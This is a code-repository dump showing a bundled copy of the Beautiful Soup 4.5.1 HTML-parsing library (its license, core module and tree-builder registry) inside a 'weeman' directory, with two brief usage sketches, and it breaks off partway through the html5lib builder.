3 | #
4 | # See 'LICENSE' for copying
5 | #
6 |
7 |
8 |
--------------------------------------------------------------------------------
/weeman/lib/bs4/COPYING.txt:
--------------------------------------------------------------------------------
1 | Beautiful Soup is made available under the MIT license:
2 |
3 | Copyright (c) 2004-2016 Leonard Richardson
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining
6 | a copy of this software and associated documentation files (the
7 | "Software"), to deal in the Software without restriction, including
8 | without limitation the rights to use, copy, modify, merge, publish,
9 | distribute, sublicense, and/or sell copies of the Software, and to
10 | permit persons to whom the Software is furnished to do so, subject to
11 | the following conditions:
12 |
13 | The above copyright notice and this permission notice shall be
14 | included in all copies or substantial portions of the Software.
15 |
16 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
17 | EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
18 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
19 | NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
20 | BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
21 | ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
22 | CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 |
25 | Beautiful Soup incorporates code from the html5lib library, which is
26 | also made available under the MIT license. Copyright (c) 2006-2013
27 | James Graham and other contributors
28 |
--------------------------------------------------------------------------------
/weeman/lib/bs4/__init__.py:
--------------------------------------------------------------------------------
1 | """Beautiful Soup
2 | Elixir and Tonic
3 | "The Screen-Scraper's Friend"
4 | http://www.crummy.com/software/BeautifulSoup/
5 |
6 | Beautiful Soup uses a pluggable XML or HTML parser to parse a
7 | (possibly invalid) document into a tree representation. Beautiful Soup
8 | provides methods and Pythonic idioms that make it easy to navigate,
9 | search, and modify the parse tree.
10 |
11 | Beautiful Soup works with Python 2.7 and up. It works better if lxml
12 | and/or html5lib is installed.
13 |
14 | For more than you ever wanted to know about Beautiful Soup, see the
15 | documentation:
16 | http://www.crummy.com/software/BeautifulSoup/bs4/doc/
17 |
18 | """
19 |
20 | # Use of this source code is governed by a BSD-style license that can be
21 | # found in the LICENSE file.
22 |
23 | __author__ = "Leonard Richardson (leonardr@segfault.org)"
24 | __version__ = "4.5.1"
25 | __copyright__ = "Copyright (c) 2004-2016 Leonard Richardson"
26 | __license__ = "MIT"
27 |
28 | __all__ = ['BeautifulSoup']
29 |
30 | import os
31 | import re
32 | import traceback
33 | import warnings
34 |
35 | from .builder import builder_registry, ParserRejectedMarkup
36 | from .dammit import UnicodeDammit
37 | from .element import (
38 | CData,
39 | Comment,
40 | DEFAULT_OUTPUT_ENCODING,
41 | Declaration,
42 | Doctype,
43 | NavigableString,
44 | PageElement,
45 | ProcessingInstruction,
46 | ResultSet,
47 | SoupStrainer,
48 | Tag,
49 | )
50 |
51 | # The very first thing we do is give a useful error if someone is
52 | # running this code under Python 3 without converting it.
53 | 'You are trying to run the Python 2 version of Beautiful Soup under Python 3. This will not work.'<>'You need to convert the code, either by installing it (`python setup.py install`) or by running 2to3 (`2to3 -w bs4`).'
54 |
55 | class BeautifulSoup(Tag):
56 | """
57 | This class defines the basic interface called by the tree builders.
58 |
59 | These methods will be called by the parser:
60 | reset()
61 | feed(markup)
62 |
63 | The tree builder may call these methods from its feed() implementation:
64 | handle_starttag(name, attrs) # See note about return value
65 | handle_endtag(name)
66 | handle_data(data) # Appends to the current data node
67 | endData(containerClass=NavigableString) # Ends the current data node
68 |
69 | No matter how complicated the underlying parser is, you should be
70 | able to build a tree using 'start tag' events, 'end tag' events,
71 | 'data' events, and "done with data" events.
72 |
73 | If you encounter an empty-element tag (aka a self-closing tag,
74 | like HTML's <br> tag), call handle_starttag and then
75 | handle_endtag.
76 | """
77 | ROOT_TAG_NAME = u'[document]'
78 |
79 | # If the end-user gives no indication which tree builder they
80 | # want, look for one with these features.
81 | DEFAULT_BUILDER_FEATURES = ['html', 'fast']
82 |
83 | ASCII_SPACES = '\x20\x0a\x09\x0c\x0d'
84 |
85 | NO_PARSER_SPECIFIED_WARNING = "No parser was explicitly specified, so I'm using the best available %(markup_type)s parser for this system (\"%(parser)s\"). This usually isn't a problem, but if you run this code on another system, or in a different virtual environment, it may use a different parser and behave differently.\n\nThe code that caused this warning is on line %(line_number)s of the file %(filename)s. To get rid of this warning, change code that looks like this:\n\n BeautifulSoup([your markup])\n\nto this:\n\n BeautifulSoup([your markup], \"%(parser)s\")\n"
86 |
87 | def __init__(self, markup="", features=None, builder=None,
88 | parse_only=None, from_encoding=None, exclude_encodings=None,
89 | **kwargs):
90 | """The Soup object is initialized as the 'root tag', and the
91 | provided markup (which can be a string or a file-like object)
92 | is fed into the underlying parser."""
93 |
94 | if 'convertEntities' in kwargs:
95 | warnings.warn(
96 | "BS4 does not respect the convertEntities argument to the "
97 | "BeautifulSoup constructor. Entities are always converted "
98 | "to Unicode characters.")
99 |
100 | if 'markupMassage' in kwargs:
101 | del kwargs['markupMassage']
102 | warnings.warn(
103 | "BS4 does not respect the markupMassage argument to the "
104 | "BeautifulSoup constructor. The tree builder is responsible "
105 | "for any necessary markup massage.")
106 |
107 | if 'smartQuotesTo' in kwargs:
108 | del kwargs['smartQuotesTo']
109 | warnings.warn(
110 | "BS4 does not respect the smartQuotesTo argument to the "
111 | "BeautifulSoup constructor. Smart quotes are always converted "
112 | "to Unicode characters.")
113 |
114 | if 'selfClosingTags' in kwargs:
115 | del kwargs['selfClosingTags']
116 | warnings.warn(
117 | "BS4 does not respect the selfClosingTags argument to the "
118 | "BeautifulSoup constructor. The tree builder is responsible "
119 | "for understanding self-closing tags.")
120 |
121 | if 'isHTML' in kwargs:
122 | del kwargs['isHTML']
123 | warnings.warn(
124 | "BS4 does not respect the isHTML argument to the "
125 | "BeautifulSoup constructor. Suggest you use "
126 | "features='lxml' for HTML and features='lxml-xml' for "
127 | "XML.")
128 |
129 | def deprecated_argument(old_name, new_name):
130 | if old_name in kwargs:
131 | warnings.warn(
132 | 'The "%s" argument to the BeautifulSoup constructor '
133 | 'has been renamed to "%s."' % (old_name, new_name))
134 | value = kwargs[old_name]
135 | del kwargs[old_name]
136 | return value
137 | return None
138 |
139 | parse_only = parse_only or deprecated_argument(
140 | "parseOnlyThese", "parse_only")
141 |
142 | from_encoding = from_encoding or deprecated_argument(
143 | "fromEncoding", "from_encoding")
144 |
145 | if from_encoding and isinstance(markup, unicode):
146 | warnings.warn("You provided Unicode markup but also provided a value for from_encoding. Your from_encoding will be ignored.")
147 | from_encoding = None
148 |
149 | if len(kwargs) > 0:
150 | arg = kwargs.keys().pop()
151 | raise TypeError(
152 | "__init__() got an unexpected keyword argument '%s'" % arg)
153 |
154 | if builder is None:
155 | original_features = features
156 | if isinstance(features, basestring):
157 | features = [features]
158 | if features is None or len(features) == 0:
159 | features = self.DEFAULT_BUILDER_FEATURES
160 | builder_class = builder_registry.lookup(*features)
161 | if builder_class is None:
162 | raise FeatureNotFound(
163 | "Couldn't find a tree builder with the features you "
164 | "requested: %s. Do you need to install a parser library?"
165 | % ",".join(features))
166 | builder = builder_class()
167 | if not (original_features == builder.NAME or
168 | original_features in builder.ALTERNATE_NAMES):
169 | if builder.is_xml:
170 | markup_type = "XML"
171 | else:
172 | markup_type = "HTML"
173 |
174 | caller = traceback.extract_stack()[0]
175 | filename = caller[0]
176 | line_number = caller[1]
177 | warnings.warn(self.NO_PARSER_SPECIFIED_WARNING % dict(
178 | filename=filename,
179 | line_number=line_number,
180 | parser=builder.NAME,
181 | markup_type=markup_type))
182 |
183 | self.builder = builder
184 | self.is_xml = builder.is_xml
185 | self.known_xml = self.is_xml
186 | self.builder.soup = self
187 |
188 | self.parse_only = parse_only
189 |
190 | if hasattr(markup, 'read'): # It's a file-type object.
191 | markup = markup.read()
192 | elif len(markup) <= 256 and (
193 | (isinstance(markup, bytes) and not b'<' in markup)
194 | or (isinstance(markup, unicode) and not u'<' in markup)
195 | ):
196 | # Print out warnings for a couple beginner problems
197 | # involving passing non-markup to Beautiful Soup.
198 | # Beautiful Soup will still parse the input as markup,
199 | # just in case that's what the user really wants.
200 | if (isinstance(markup, unicode)
201 | and not os.path.supports_unicode_filenames):
202 | possible_filename = markup.encode("utf8")
203 | else:
204 | possible_filename = markup
205 | is_file = False
206 | try:
207 | is_file = os.path.exists(possible_filename)
208 | except Exception, e:
209 | # This is almost certainly a problem involving
210 | # characters not valid in filenames on this
211 | # system. Just let it go.
212 | pass
213 | if is_file:
214 | if isinstance(markup, unicode):
215 | markup = markup.encode("utf8")
216 | warnings.warn(
217 | '"%s" looks like a filename, not markup. You should'
218 | 'probably open this file and pass the filehandle into'
219 | 'Beautiful Soup.' % markup)
220 | self._check_markup_is_url(markup)
221 |
222 | for (self.markup, self.original_encoding, self.declared_html_encoding,
223 | self.contains_replacement_characters) in (
224 | self.builder.prepare_markup(
225 | markup, from_encoding, exclude_encodings=exclude_encodings)):
226 | self.reset()
227 | try:
228 | self._feed()
229 | break
230 | except ParserRejectedMarkup:
231 | pass
232 |
233 | # Clear out the markup and remove the builder's circular
234 | # reference to this object.
235 | self.markup = None
236 | self.builder.soup = None
237 |
238 | def __copy__(self):
239 | copy = type(self)(
240 | self.encode('utf-8'), builder=self.builder, from_encoding='utf-8'
241 | )
242 |
243 | # Although we encoded the tree to UTF-8, that may not have
244 | # been the encoding of the original markup. Set the copy's
245 | # .original_encoding to reflect the original object's
246 | # .original_encoding.
247 | copy.original_encoding = self.original_encoding
248 | return copy
249 |
250 | def __getstate__(self):
251 | # Frequently a tree builder can't be pickled.
252 | d = dict(self.__dict__)
253 | if 'builder' in d and not self.builder.picklable:
254 | d['builder'] = None
255 | return d
256 |
257 | @staticmethod
258 | def _check_markup_is_url(markup):
259 | """
260 | Check if markup looks like it's actually a url and raise a warning
261 | if so. Markup can be unicode or str (py2) / bytes (py3).
262 | """
263 | if isinstance(markup, bytes):
264 | space = b' '
265 | cant_start_with = (b"http:", b"https:")
266 | elif isinstance(markup, unicode):
267 | space = u' '
268 | cant_start_with = (u"http:", u"https:")
269 | else:
270 | return
271 |
272 | if any(markup.startswith(prefix) for prefix in cant_start_with):
273 | if not space in markup:
274 | if isinstance(markup, bytes):
275 | decoded_markup = markup.decode('utf-8', 'replace')
276 | else:
277 | decoded_markup = markup
278 | warnings.warn(
279 | '"%s" looks like a URL. Beautiful Soup is not an'
280 | ' HTTP client. You should probably use an HTTP client like'
281 | ' requests to get the document behind the URL, and feed'
282 | ' that document to Beautiful Soup.' % decoded_markup
283 | )
284 |
285 | def _feed(self):
286 | # Convert the document to Unicode.
287 | self.builder.reset()
288 |
289 | self.builder.feed(self.markup)
290 | # Close out any unfinished strings and close all the open tags.
291 | self.endData()
292 | while self.currentTag.name != self.ROOT_TAG_NAME:
293 | self.popTag()
294 |
295 | def reset(self):
296 | Tag.__init__(self, self, self.builder, self.ROOT_TAG_NAME)
297 | self.hidden = 1
298 | self.builder.reset()
299 | self.current_data = []
300 | self.currentTag = None
301 | self.tagStack = []
302 | self.preserve_whitespace_tag_stack = []
303 | self.pushTag(self)
304 |
305 | def new_tag(self, name, namespace=None, nsprefix=None, **attrs):
306 | """Create a new tag associated with this soup."""
307 | return Tag(None, self.builder, name, namespace, nsprefix, attrs)
308 |
309 | def new_string(self, s, subclass=NavigableString):
310 | """Create a new NavigableString associated with this soup."""
311 | return subclass(s)
312 |
313 | def insert_before(self, successor):
314 | raise NotImplementedError("BeautifulSoup objects don't support insert_before().")
315 |
316 | def insert_after(self, successor):
317 | raise NotImplementedError("BeautifulSoup objects don't support insert_after().")
318 |
319 | def popTag(self):
320 | tag = self.tagStack.pop()
321 | if self.preserve_whitespace_tag_stack and tag == self.preserve_whitespace_tag_stack[-1]:
322 | self.preserve_whitespace_tag_stack.pop()
323 | #print "Pop", tag.name
324 | if self.tagStack:
325 | self.currentTag = self.tagStack[-1]
326 | return self.currentTag
327 |
328 | def pushTag(self, tag):
329 | #print "Push", tag.name
330 | if self.currentTag:
331 | self.currentTag.contents.append(tag)
332 | self.tagStack.append(tag)
333 | self.currentTag = self.tagStack[-1]
334 | if tag.name in self.builder.preserve_whitespace_tags:
335 | self.preserve_whitespace_tag_stack.append(tag)
336 |
337 | def endData(self, containerClass=NavigableString):
338 | if self.current_data:
339 | current_data = u''.join(self.current_data)
340 | # If whitespace is not preserved, and this string contains
341 | # nothing but ASCII spaces, replace it with a single space
342 | # or newline.
343 | if not self.preserve_whitespace_tag_stack:
344 | strippable = True
345 | for i in current_data:
346 | if i not in self.ASCII_SPACES:
347 | strippable = False
348 | break
349 | if strippable:
350 | if '\n' in current_data:
351 | current_data = '\n'
352 | else:
353 | current_data = ' '
354 |
355 | # Reset the data collector.
356 | self.current_data = []
357 |
358 | # Should we add this string to the tree at all?
359 | if self.parse_only and len(self.tagStack) <= 1 and \
360 | (not self.parse_only.text or \
361 | not self.parse_only.search(current_data)):
362 | return
363 |
364 | o = containerClass(current_data)
365 | self.object_was_parsed(o)
366 |
367 | def object_was_parsed(self, o, parent=None, most_recent_element=None):
368 | """Add an object to the parse tree."""
369 | parent = parent or self.currentTag
370 | previous_element = most_recent_element or self._most_recent_element
371 |
372 | next_element = previous_sibling = next_sibling = None
373 | if isinstance(o, Tag):
374 | next_element = o.next_element
375 | next_sibling = o.next_sibling
376 | previous_sibling = o.previous_sibling
377 | if not previous_element:
378 | previous_element = o.previous_element
379 |
380 | o.setup(parent, previous_element, next_element, previous_sibling, next_sibling)
381 |
382 | self._most_recent_element = o
383 | parent.contents.append(o)
384 |
385 | if parent.next_sibling:
386 | # This node is being inserted into an element that has
387 | # already been parsed. Deal with any dangling references.
388 | index = len(parent.contents)-1
389 | while index >= 0:
390 | if parent.contents[index] is o:
391 | break
392 | index -= 1
393 | else:
394 | raise ValueError(
395 | "Error building tree: supposedly %r was inserted "
396 | "into %r after the fact, but I don't see it!" % (
397 | o, parent
398 | )
399 | )
400 | if index == 0:
401 | previous_element = parent
402 | previous_sibling = None
403 | else:
404 | previous_element = previous_sibling = parent.contents[index-1]
405 | if index == len(parent.contents)-1:
406 | next_element = parent.next_sibling
407 | next_sibling = None
408 | else:
409 | next_element = next_sibling = parent.contents[index+1]
410 |
411 | o.previous_element = previous_element
412 | if previous_element:
413 | previous_element.next_element = o
414 | o.next_element = next_element
415 | if next_element:
416 | next_element.previous_element = o
417 | o.next_sibling = next_sibling
418 | if next_sibling:
419 | next_sibling.previous_sibling = o
420 | o.previous_sibling = previous_sibling
421 | if previous_sibling:
422 | previous_sibling.next_sibling = o
423 |
424 | def _popToTag(self, name, nsprefix=None, inclusivePop=True):
425 | """Pops the tag stack up to and including the most recent
426 | instance of the given tag. If inclusivePop is false, pops the tag
427 | stack up to but *not* including the most recent instance of
428 | the given tag."""
429 | #print "Popping to %s" % name
430 | if name == self.ROOT_TAG_NAME:
431 | # The BeautifulSoup object itself can never be popped.
432 | return
433 |
434 | most_recently_popped = None
435 |
436 | stack_size = len(self.tagStack)
437 | for i in range(stack_size - 1, 0, -1):
438 | t = self.tagStack[i]
439 | if (name == t.name and nsprefix == t.prefix):
440 | if inclusivePop:
441 | most_recently_popped = self.popTag()
442 | break
443 | most_recently_popped = self.popTag()
444 |
445 | return most_recently_popped
446 |
447 | def handle_starttag(self, name, namespace, nsprefix, attrs):
448 | """Push a start tag on to the stack.
449 |
450 | If this method returns None, the tag was rejected by the
451 | SoupStrainer. You should proceed as if the tag had not occurred
452 | in the document. For instance, if this was a self-closing tag,
453 | don't call handle_endtag.
454 | """
455 |
456 | # print "Start tag %s: %s" % (name, attrs)
457 | self.endData()
458 |
459 | if (self.parse_only and len(self.tagStack) <= 1
460 | and (self.parse_only.text
461 | or not self.parse_only.search_tag(name, attrs))):
462 | return None
463 |
464 | tag = Tag(self, self.builder, name, namespace, nsprefix, attrs,
465 | self.currentTag, self._most_recent_element)
466 | if tag is None:
467 | return tag
468 | if self._most_recent_element:
469 | self._most_recent_element.next_element = tag
470 | self._most_recent_element = tag
471 | self.pushTag(tag)
472 | return tag
473 |
474 | def handle_endtag(self, name, nsprefix=None):
475 | #print "End tag: " + name
476 | self.endData()
477 | self._popToTag(name, nsprefix)
478 |
479 | def handle_data(self, data):
480 | self.current_data.append(data)
481 |
482 | def decode(self, pretty_print=False,
483 | eventual_encoding=DEFAULT_OUTPUT_ENCODING,
484 | formatter="minimal"):
485 | """Returns a string or Unicode representation of this document.
486 | To get Unicode, pass None for encoding."""
487 |
488 | if self.is_xml:
489 | # Print the XML declaration
490 | encoding_part = ''
491 | if eventual_encoding != None:
492 | encoding_part = ' encoding="%s"' % eventual_encoding
493 | prefix = u'<?xml version="1.0"%s?>\n' % encoding_part
494 | else:
495 | prefix = u''
496 | if not pretty_print:
497 | indent_level = None
498 | else:
499 | indent_level = 0
500 | return prefix + super(BeautifulSoup, self).decode(
501 | indent_level, eventual_encoding, formatter)
502 |
503 | # Alias to make it easier to type import: 'from bs4 import _soup'
504 | _s = BeautifulSoup
505 | _soup = BeautifulSoup
506 |
507 | class BeautifulStoneSoup(BeautifulSoup):
508 | """Deprecated interface to an XML parser."""
509 |
510 | def __init__(self, *args, **kwargs):
511 | kwargs['features'] = 'xml'
512 | warnings.warn(
513 | 'The BeautifulStoneSoup class is deprecated. Instead of using '
514 | 'it, pass features="xml" into the BeautifulSoup constructor.')
515 | super(BeautifulStoneSoup, self).__init__(*args, **kwargs)
516 |
517 |
518 | class StopParsing(Exception):
519 | pass
520 |
521 | class FeatureNotFound(ValueError):
522 | pass
523 |
524 |
525 | #By default, act as an HTML pretty-printer.
526 | if __name__ == '__main__':
527 | import sys
528 | soup = BeautifulSoup(sys.stdin)
529 | print soup.prettify()
530 |
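
A minimal usage sketch for the constructor above, assuming this bundled
copy is importable as lib.bs4 (the import path used by the other modules
in this tree). Naming the parser explicitly avoids the
NO_PARSER_SPECIFIED_WARNING path:

    from lib.bs4 import BeautifulSoup

    # An explicit parser name ("html.parser" ships with the stdlib)
    # suppresses the "no parser was explicitly specified" warning.
    soup = BeautifulSoup("<p class='a b'>hello</p>", "html.parser")
    p = soup.find("p")
    print(p["class"])      # ['a', 'b'] -- 'class' is a cdata-list attribute
    print(soup.prettify())
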
--------------------------------------------------------------------------------
/weeman/lib/bs4/builder/0.txt:
--------------------------------------------------------------------------------
1 | https://github.com/GottModusTermux/
2 |
--------------------------------------------------------------------------------
/weeman/lib/bs4/builder/__init__.py:
--------------------------------------------------------------------------------
1 | # Use of this source code is governed by a BSD-style license that can be
2 | # found in the LICENSE file.
3 |
4 | from collections import defaultdict
5 | import itertools
6 | import sys
7 | from lib.bs4.element import (
8 | CharsetMetaAttributeValue,
9 | ContentMetaAttributeValue,
10 | HTMLAwareEntitySubstitution,
11 | whitespace_re
12 | )
13 |
14 | __all__ = [
15 | 'HTMLTreeBuilder',
16 | 'SAXTreeBuilder',
17 | 'TreeBuilder',
18 | 'TreeBuilderRegistry',
19 | ]
20 |
21 | # Some useful features for a TreeBuilder to have.
22 | FAST = 'fast'
23 | PERMISSIVE = 'permissive'
24 | STRICT = 'strict'
25 | XML = 'xml'
26 | HTML = 'html'
27 | HTML_5 = 'html5'
28 |
29 |
30 | class TreeBuilderRegistry(object):
31 |
32 | def __init__(self):
33 | self.builders_for_feature = defaultdict(list)
34 | self.builders = []
35 |
36 | def register(self, treebuilder_class):
37 | """Register a treebuilder based on its advertised features."""
38 | for feature in treebuilder_class.features:
39 | self.builders_for_feature[feature].insert(0, treebuilder_class)
40 | self.builders.insert(0, treebuilder_class)
41 |
42 | def lookup(self, *features):
43 | if len(self.builders) == 0:
44 | # There are no builders at all.
45 | return None
46 |
47 | if len(features) == 0:
48 | # They didn't ask for any features. Give them the most
49 | # recently registered builder.
50 | return self.builders[0]
51 |
52 | # Go down the list of features in order, and eliminate any builders
53 | # that don't match every feature.
54 | features = list(features)
55 | features.reverse()
56 | candidates = None
57 | candidate_set = None
58 | while len(features) > 0:
59 | feature = features.pop()
60 | we_have_the_feature = self.builders_for_feature.get(feature, [])
61 | if len(we_have_the_feature) > 0:
62 | if candidates is None:
63 | candidates = we_have_the_feature
64 | candidate_set = set(candidates)
65 | else:
66 | # Eliminate any candidates that don't have this feature.
67 | candidate_set = candidate_set.intersection(
68 | set(we_have_the_feature))
69 |
70 | # The only valid candidates are the ones in candidate_set.
71 | # Go through the original list of candidates and pick the first one
72 | # that's in candidate_set.
73 | if candidate_set is None:
74 | return None
75 | for candidate in candidates:
76 | if candidate in candidate_set:
77 | return candidate
78 | return None
79 |
80 | # The BeautifulSoup class will take feature lists from developers and use them
81 | # to look up builders in this registry.
82 | builder_registry = TreeBuilderRegistry()
83 |
84 | class TreeBuilder(object):
85 | """Turn a document into a Beautiful Soup object tree."""
86 |
87 | NAME = "[Unknown tree builder]"
88 | ALTERNATE_NAMES = []
89 | features = []
90 |
91 | is_xml = False
92 | picklable = False
93 | preserve_whitespace_tags = set()
94 | empty_element_tags = None # A tag will be considered an empty-element
95 | # tag when and only when it has no contents.
96 |
97 | # A value for these tag/attribute combinations is a space- or
98 | # comma-separated list of CDATA, rather than a single CDATA.
99 | cdata_list_attributes = {}
100 |
101 |
102 | def __init__(self):
103 | self.soup = None
104 |
105 | def reset(self):
106 | pass
107 |
108 | def can_be_empty_element(self, tag_name):
109 | """Might a tag with this name be an empty-element tag?
110 |
111 | The final markup may or may not actually present this tag as
112 | self-closing.
113 |
114 | For instance: an HTMLBuilder does not consider a <p> tag to be
115 | an empty-element tag (it's not in
116 | HTMLBuilder.empty_element_tags). This means an empty <p> tag
117 | will be presented as "<p></p>", not "<p/>".
118 |
119 | The default implementation has no opinion about which tags are
120 | empty-element tags, so a tag will be presented as an
121 | empty-element tag if and only if it has no contents.
122 | "<foo></foo>" will become "<foo/>", and "<foo>bar</foo>" will
123 | be left alone.
124 | """
125 | if self.empty_element_tags is None:
126 | return True
127 | return tag_name in self.empty_element_tags
128 |
129 | def feed(self, markup):
130 | raise NotImplementedError()
131 |
132 | def prepare_markup(self, markup, user_specified_encoding=None,
133 | document_declared_encoding=None):
134 | return markup, None, None, False
135 |
136 | def test_fragment_to_document(self, fragment):
137 | """Wrap an HTML fragment to make it look like a document.
138 |
139 | Different parsers do this differently. For instance, lxml
140 | introduces an empty <head> tag, and html5lib
141 | doesn't. Abstracting this away lets us write simple tests
142 | which run HTML fragments through the parser and compare the
143 | results against other HTML fragments.
144 |
145 | This method should not be used outside of tests.
146 | """
147 | return fragment
148 |
149 | def set_up_substitutions(self, tag):
150 | return False
151 |
152 | def _replace_cdata_list_attribute_values(self, tag_name, attrs):
153 | """Replaces class="foo bar" with class=["foo", "bar"]
154 |
155 | Modifies its input in place.
156 | """
157 | if not attrs:
158 | return attrs
159 | if self.cdata_list_attributes:
160 | universal = self.cdata_list_attributes.get('*', [])
161 | tag_specific = self.cdata_list_attributes.get(
162 | tag_name.lower(), None)
163 | for attr in attrs.keys():
164 | if attr in universal or (tag_specific and attr in tag_specific):
165 | # We have a "class"-type attribute whose string
166 | # value is a whitespace-separated list of
167 | # values. Split it into a list.
168 | value = attrs[attr]
169 | if isinstance(value, basestring):
170 | values = whitespace_re.split(value)
171 | else:
172 | # html5lib sometimes calls setAttributes twice
173 | # for the same tag when rearranging the parse
174 | # tree. On the second call the attribute value
175 | # here is already a list. If this happens,
176 | # leave the value alone rather than trying to
177 | # split it again.
178 | values = value
179 | attrs[attr] = values
180 | return attrs
181 |
182 | class SAXTreeBuilder(TreeBuilder):
183 | """A Beautiful Soup treebuilder that listens for SAX events."""
184 |
185 | def feed(self, markup):
186 | raise NotImplementedError()
187 |
188 | def close(self):
189 | pass
190 |
191 | def startElement(self, name, attrs):
192 | attrs = dict((key[1], value) for key, value in list(attrs.items()))
193 | #print "Start %s, %r" % (name, attrs)
194 | self.soup.handle_starttag(name, attrs)
195 |
196 | def endElement(self, name):
197 | #print "End %s" % name
198 | self.soup.handle_endtag(name)
199 |
200 | def startElementNS(self, nsTuple, nodeName, attrs):
201 | # Throw away (ns, nodeName) for now.
202 | self.startElement(nodeName, attrs)
203 |
204 | def endElementNS(self, nsTuple, nodeName):
205 | # Throw away (ns, nodeName) for now.
206 | self.endElement(nodeName)
207 | #handler.endElementNS((ns, node.nodeName), node.nodeName)
208 |
209 | def startPrefixMapping(self, prefix, nodeValue):
210 | # Ignore the prefix for now.
211 | pass
212 |
213 | def endPrefixMapping(self, prefix):
214 | # Ignore the prefix for now.
215 | # handler.endPrefixMapping(prefix)
216 | pass
217 |
218 | def characters(self, content):
219 | self.soup.handle_data(content)
220 |
221 | def startDocument(self):
222 | pass
223 |
224 | def endDocument(self):
225 | pass
226 |
227 |
228 | class HTMLTreeBuilder(TreeBuilder):
229 | """This TreeBuilder knows facts about HTML.
230 |
231 | Such as which tags are empty-element tags.
232 | """
233 |
234 | preserve_whitespace_tags = HTMLAwareEntitySubstitution.preserve_whitespace_tags
235 | empty_element_tags = set(['br' , 'hr', 'input', 'img', 'meta',
236 | 'spacer', 'link', 'frame', 'base'])
237 |
238 | # The HTML standard defines these attributes as containing a
239 | # space-separated list of values, not a single value. That is,
240 | # class="foo bar" means that the 'class' attribute has two values,
241 | # 'foo' and 'bar', not the single value 'foo bar'. When we
242 | # encounter one of these attributes, we will parse its value into
243 | # a list of values if possible. Upon output, the list will be
244 | # converted back into a string.
245 | cdata_list_attributes = {
246 | "*" : ['class', 'accesskey', 'dropzone'],
247 | "a" : ['rel', 'rev'],
248 | "link" : ['rel', 'rev'],
249 | "td" : ["headers"],
250 | "th" : ["headers"],
251 | "td" : ["headers"],
252 | "form" : ["accept-charset"],
253 | "object" : ["archive"],
254 |
255 | # These are HTML5 specific, as are *.accesskey and *.dropzone above.
256 | "area" : ["rel"],
257 | "icon" : ["sizes"],
258 | "iframe" : ["sandbox"],
259 | "output" : ["for"],
260 | }
261 |
262 | def set_up_substitutions(self, tag):
263 | # We are only interested in <meta> tags
264 | if tag.name != 'meta':
265 | return False
266 |
267 | http_equiv = tag.get('http-equiv')
268 | content = tag.get('content')
269 | charset = tag.get('charset')
270 |
271 | # We are interested in <meta> tags that say what encoding the
272 | # document was originally in. This means HTML 5-style <meta>
273 | # tags that provide the "charset" attribute. It also means
274 | # HTML 4-style <meta> tags that provide the "content"
275 | # attribute and have "http-equiv" set to "content-type".
276 | #
277 | # In both cases we will replace the value of the appropriate
278 | # attribute with a standin object that can take on any
279 | # encoding.
280 | meta_encoding = None
281 | if charset is not None:
282 | # HTML 5 style:
283 | # <meta charset="utf8">
284 | meta_encoding = charset
285 | tag['charset'] = CharsetMetaAttributeValue(charset)
286 |
287 | elif (content is not None and http_equiv is not None
288 | and http_equiv.lower() == 'content-type'):
289 | # HTML 4 style:
290 | # <meta http-equiv="content-type" content="text/html; charset=utf8">
291 | tag['content'] = ContentMetaAttributeValue(content)
292 |
293 | return (meta_encoding is not None)
294 |
295 | def register_treebuilders_from(module):
296 | """Copy TreeBuilders from the given module into this module."""
297 | # I'm fairly sure this is not the best way to do this.
298 | this_module = sys.modules['lib.bs4.builder']
299 | for name in module.__all__:
300 | obj = getattr(module, name)
301 |
302 | if issubclass(obj, TreeBuilder):
303 | setattr(this_module, name, obj)
304 | this_module.__all__.append(name)
305 | # Register the builder while we're at it.
306 | this_module.builder_registry.register(obj)
307 |
308 | class ParserRejectedMarkup(Exception):
309 | pass
310 |
311 | # Builders are registered in reverse order of priority, so that custom
312 | # builder registrations will take precedence. In general, we want lxml
313 | # to take precedence over html5lib, because it's faster. And we only
314 | # want to use HTMLParser as a last result.
315 | from . import _htmlparser
316 | register_treebuilders_from(_htmlparser)
317 | try:
318 | from . import _html5lib
319 | register_treebuilders_from(_html5lib)
320 | except ImportError:
321 | # They don't have html5lib installed.
322 | pass
323 | try:
324 | from . import _lxml
325 | register_treebuilders_from(_lxml)
326 | except ImportError:
327 | # They don't have lxml installed.
328 | pass
329 |
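
A short sketch of how lookup() above resolves a feature list, assuming at
least the bundled _htmlparser builder registered at import time:

    from lib.bs4.builder import builder_registry

    # Features that no registered builder advertises are silently
    # skipped, so ('html', 'fast') still finds a builder even when lxml
    # (the only builder advertising 'fast') is missing. lookup() returns
    # None only if no requested feature matched any builder at all.
    cls = builder_registry.lookup('html', 'fast')
    print(cls.NAME if cls else "no matching builder")
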
--------------------------------------------------------------------------------
/weeman/lib/bs4/builder/_html5lib.py:
--------------------------------------------------------------------------------
1 | # Use of this source code is governed by a BSD-style license that can be
2 | # found in the LICENSE file.
3 |
4 | __all__ = [
5 | 'HTML5TreeBuilder',
6 | ]
7 |
8 | import warnings
9 | from lib.bs4.builder import (
10 | PERMISSIVE,
11 | HTML,
12 | HTML_5,
13 | HTMLTreeBuilder,
14 | )
15 | from lib.bs4.element import (
16 | NamespacedAttribute,
17 | whitespace_re,
18 | )
19 | import lib.html5lib as html5lib
20 | from lib.html5lib.constants import namespaces
21 | from lib.bs4.element import (
22 | Comment,
23 | Doctype,
24 | NavigableString,
25 | Tag,
26 | )
27 |
28 | try:
29 | # Pre-0.99999999
30 | from lib.html5lib.treebuilders import _base as treebuilder_base
31 | new_html5lib = False
32 | except ImportError, e:
33 | # 0.99999999 and up
34 | from lib.html5lib.treebuilders import base as treebuilder_base
35 | new_html5lib = True
36 |
37 | class HTML5TreeBuilder(HTMLTreeBuilder):
38 | """Use html5lib to build a tree."""
39 |
40 | NAME = "html5lib"
41 |
42 | features = [NAME, PERMISSIVE, HTML_5, HTML]
43 |
44 | def prepare_markup(self, markup, user_specified_encoding,
45 | document_declared_encoding=None, exclude_encodings=None):
46 | # Store the user-specified encoding for use later on.
